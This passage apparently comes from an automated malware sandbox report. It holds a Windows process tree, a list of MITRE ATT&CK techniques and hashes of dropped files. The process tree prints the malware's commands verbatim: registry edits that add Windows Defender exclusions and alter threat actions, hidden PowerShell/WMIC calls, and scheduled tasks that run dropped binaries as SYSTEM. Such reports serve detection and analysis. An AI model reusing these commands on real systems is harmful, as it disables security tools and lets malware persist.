  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VyWMmqtuSNndeGVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3324
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1208
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1560
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3712
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1660
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3532
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 03:20:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\NFpAHxv.exe\" GH /Nbicdidbs 385118 /S" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:1456
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "XyyyteIMwZeutaZuw"
    3⤵
    PID:2268
- C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\NFpAHxv.exe
  C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\NFpAHxv.exe GH /Nbicdidbs 385118 /S
  2⤵
  PID:3192
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:1244
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:1568
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1656
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:4020
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:3008
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2448
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:3616
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:3084
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3348
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:3044
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:2992
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2828
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:3140
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:3680
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:3860
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4072
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:3664
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
    3⤵
    PID:2240
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      4⤵
      PID:2112
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        
        PID:2040
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1788
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        7⤵
        
        PID:3248
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
      4⤵
      PID:2752
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        5⤵
        
        PID:2508
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3952
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        7⤵
        
        PID:2732
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\RfUCrj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2940
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\ToNBcil.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:4064
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "FPieTEPPuEmJrhC"
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\ehwUbKI.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:356
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\EReGVRO.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:3444
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\KrqjkyL.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:544
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\TPCHQcQ.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:2040
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 11:20:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\avxAmfjK\TYRvZiQ.dll\",#1 /wZodidZA 385118" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2360
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "rrqYunoktxOQmCoCX"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
    3⤵
    PID:2760
- C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\lKdXuMn.exe
  C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\lKdXuMn.exe GH /nIqNdidXA 385118 /S
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:3792
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:3980
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1568
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:1276
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:3112
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2720
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:2596
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:3872
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:1052
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:2484
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:3456
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2764
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:1996
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:2548
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:2136
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4092
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:2472
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
    3⤵
    PID:1692
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
      4⤵
      PID:2256
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        
        PID:2304
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2828
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        7⤵
        
        PID:2484
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
      4⤵
      PID:2196
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        5⤵
        
        PID:804
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1492
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
        7⤵
        
        PID:3008
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\uEnpwG.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2096
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\CZHgcYp.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "FPieTEPPuEmJrhC"
    3⤵
    PID:3436
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\SkXVwIm.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1456
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\EoFBZhP.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:944
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\bYOwNNG.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:1228
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\ecbOcLL.xml" /RU "SYSTEM"
    3⤵
    - Creates scheduled task(s)
    PID:3588
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
    3⤵
    PID:2828
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\avxAmfjK\TYRvZiQ.dll",#1 /wZodidZA 385118
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\avxAmfjK\TYRvZiQ.dll",#1 /wZodidZA 385118
    3⤵
    PID:3812
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
      4⤵
      PID:2504

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3668

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1056

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "600298293-43086648706781016-813251597-1160883711-1796718265-213712765917956893"
1⤵
PID:3236

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1480860119-15148007571026574562513868101-1343811443-326228311-12394313081701625990"
1⤵
PID:268

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1413259802-104990721176658927718753677971159039460-864429962-1315484792-1952776582"
1⤵
PID:3080

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2865713671797879831-93505382-84000086-972935384-1276965024-5601966121872202003"
1⤵
PID:3272

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:4064

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2380

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x540
1⤵
PID:240

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\installc.bat

Filesize
301B

MD5
998ab24316795f67c26aca0f1b38c8ce

SHA1
a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

SHA256
a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

SHA512
7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

Download Submit
C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Program Files (x86)\GameSyncLink\installm.bat

Filesize
218B

MD5
94b87b86dc338b8f0c4e5869496a8a35

SHA1
2584e6496d048068f61ac72f5c08b54ad08627c3

SHA256
2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

SHA512
b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
7f6d33504161b0c82158ae8d9f2f5add

SHA1
101469e9bcf011a3d3c10ba79c91ef3560c4f1b4

SHA256
f21a8c187929a21c8f1760ae823094a8e5fdac73be688468f503ed4bfcc2612a

SHA512
e47f76ceccfeeb8d3cc6ff7e4780e5d40ea4d95a5c7fb84700b06ad27af65e0f3cbb4c3ad54d4ed8ac9b3d94d3298b1ac4624177b019a441b1b30b0990bc32be

Download Submit
C:\Users\Admin\1000021002\bcaa5b1d77.exe

Filesize
1.1MB

MD5
eb9d9984da999e896730c644df24b147

SHA1
0f10fa621aaedd8d30fd6bc9a95bc74a5bf20f68

SHA256
634a436f42cac1098bf608da65abe493f0b72f36d63827decc5254e9a6f44aea

SHA512
86dc1affbc8a0efd1b5e4597747dc5426673c12222e5e06337aec92f070200b51fd49463adc21a3209d625df6669563efa232a4bbd12f044c380b6fdf1c3a261

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Filesize
893B

MD5
d4ae187b4574036c2d76b6df8a8c1a30

SHA1
b06f409fa14bab33cbaf4a37811b8740b624d9e5

SHA256
a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

SHA512
